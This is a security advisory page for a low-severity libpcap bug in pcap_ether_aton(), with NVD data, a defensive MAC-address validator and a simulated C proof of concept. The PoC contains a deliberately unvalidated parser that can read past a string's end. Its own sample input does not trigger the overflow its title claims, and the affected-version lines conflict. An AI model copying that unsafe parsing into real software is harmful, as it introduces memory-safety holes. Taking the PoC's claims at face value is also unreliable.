Security Vulnerability Report
CVE-2025-11961 CVSS 1.9 LOW

CVE-2025-11961

Published: 2025-12-31 01:15:55
Last Modified: 2026-04-15 00:35:42

Description

pcap_ether_aton() is an auxiliary function in libpcap that takes a string argument and returns a fixed-size allocated buffer. The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented. If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer.
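An application-side guard for the requirement described above, as an added example (not libpcap's code and not part of the advisory): `parse_strict_mac48` is a hypothetical helper that accepts only one assumed canonical notation, deliberately narrower than whatever set of formats libpcap supports, and converts it with bounded reads and writes.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAC48_OCTETS 6
#define MAC48_STRLEN 17   /* "xx:xx:xx:xx:xx:xx" */

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = (char)tolower((unsigned char)c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Hypothetical helper, not a libpcap API. Accepts only six two-digit hex
 * groups joined by one consistent ':' or '-' (an assumed, deliberately
 * narrow subset of MAC-48 notations). Returns 1 and fills out[] on success,
 * 0 on any deviation; never reads past the terminator or writes past out[5]. */
int parse_strict_mac48(const char *s, unsigned char out[MAC48_OCTETS])
{
    if (s == NULL || strlen(s) != MAC48_STRLEN)
        return 0;                       /* length checked before any indexing */
    char sep = s[2];
    if (sep != ':' && sep != '-')
        return 0;
    unsigned char tmp[MAC48_OCTETS];
    for (int i = 0; i < MAC48_OCTETS; i++) {
        int hi = hexval(s[3 * i]), lo = hexval(s[3 * i + 1]);
        if (hi < 0 || lo < 0)
            return 0;
        if (i < MAC48_OCTETS - 1 && s[3 * i + 2] != sep)
            return 0;                   /* mixed or missing separator */
        tmp[i] = (unsigned char)(hi << 4 | lo);
    }
    memcpy(out, tmp, sizeof tmp);       /* out[] untouched on failure */
    return 1;
}

int main(void)
{
    /* Constructed sample inputs. */
    const char *samples[] = { "00:1a:2B:3c:4D:5e", "AA:BB:CC",
                              "00:11:22:33:44:55:66", "00:11-22:33:44:55" };
    unsigned char mac[MAC48_OCTETS];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-22s %s\n", samples[i],
               parse_strict_mac48(samples[i], mac) ? "accept" : "reject");
    return 0;
}
```

An application that still has to call pcap_ether_aton() can pass it only strings this check accepts, so the argument stays within the well-formed case the description requires.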

CVSS Details

CVSS Score: 1.9
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

libpcap < 1.10.5
libpcap < 1.11.0 (patched versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2025-11961 PoC - libpcap pcap_ether_aton() Buffer Overflow
// This PoC demonstrates how malformed MAC address input can cause buffer overflow
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simulated version of vulnerable pcap_ether_aton function (not libpcap's source)
// Original function in libpcap doesn't properly validate input format
char* vulnerable_pcap_ether_aton(const char* addr_str) {
    // Allocate fixed-size buffer for MAC address (6 bytes), zero-filled so
    // octets that are never parsed print as 00 instead of uninitialised heap data
    char* result = (char*)calloc(6, 1);
    if (!result) return NULL;

    // Vulnerable parsing - the input format is never validated
    int i = 0;
    const char* ptr = addr_str;
    while (*ptr && i < 6) {
        // Skip non-hex characters (any separator, in any number, is accepted)
        while (*ptr && !((*ptr >= '0' && *ptr <= '9') ||
                         (*ptr >= 'A' && *ptr <= 'F') ||
                         (*ptr >= 'a' && *ptr <= 'f'))) {
            ptr++;
        }
        if (*ptr == '\0') break;

        // Parse byte without proper validation: ptr[1] is not checked, so when
        // a single hex digit ends the string, ptr += 2 steps past the terminator
        // and the next loop test reads beyond the string
        char byte_str[3] = {ptr[0], ptr[1], '\0'};
        result[i++] = (char)strtol(byte_str, NULL, 16);
        ptr += 2;
    }
    return result;
}

int main(void) {
    printf("CVE-2025-11961 PoC - libpcap pcap_ether_aton() Buffer Overflow\n");
    printf("=============================================================\n\n");

    // Malformed MAC address: incomplete, only three of the six octets
    const char* malformed_mac = "AA:BB:CC";
    printf("Testing with malformed MAC address: %s\n", malformed_mac);
    printf("Input length: %zu bytes\n", strlen(malformed_mac));

    // Call the simulated function; it reports no error for the short input
    char* result = vulnerable_pcap_ether_aton(malformed_mac);
    if (result) {
        printf("Result: ");
        for (int i = 0; i < 6; i++) {
            printf("%02X%s", (unsigned char)result[i], i < 5 ? ":" : "");
        }
        printf("\n");
        free(result);
    }

    printf("\nMalformed input was accepted without an error\n");
    printf("Fix: Update to patched libpcap version\n");
    return 0;
}

// Build: gcc -o poc poc.c
// Note: This PoC demonstrates the vulnerability concept. Actual exploitation requires specific conditions.
```

References

https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11961", "sourceIdentifier": "[email protected]", "published": "2025-12-31T01:15:54.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer. The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented. If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer."}, {"lang": "es", "value": "pcap_ether_aton() es una función auxiliar en libpcap, toma un argumento de cadena y devuelve un búfer asignado de tamaño fijo. El argumento de cadena debe ser una dirección MAC-48 bien formada en uno de los formatos admitidos, pero este requisito ha sido mal documentado. 
Si una aplicación llama a la función con un argumento que se desvía del formato esperado, la función puede leer datos más allá del final de la cadena proporcionada y escribir datos más allá del final del búfer asignado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-126"}]}], "references": [{"url": "https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02", "source": "[email protected]"}]}}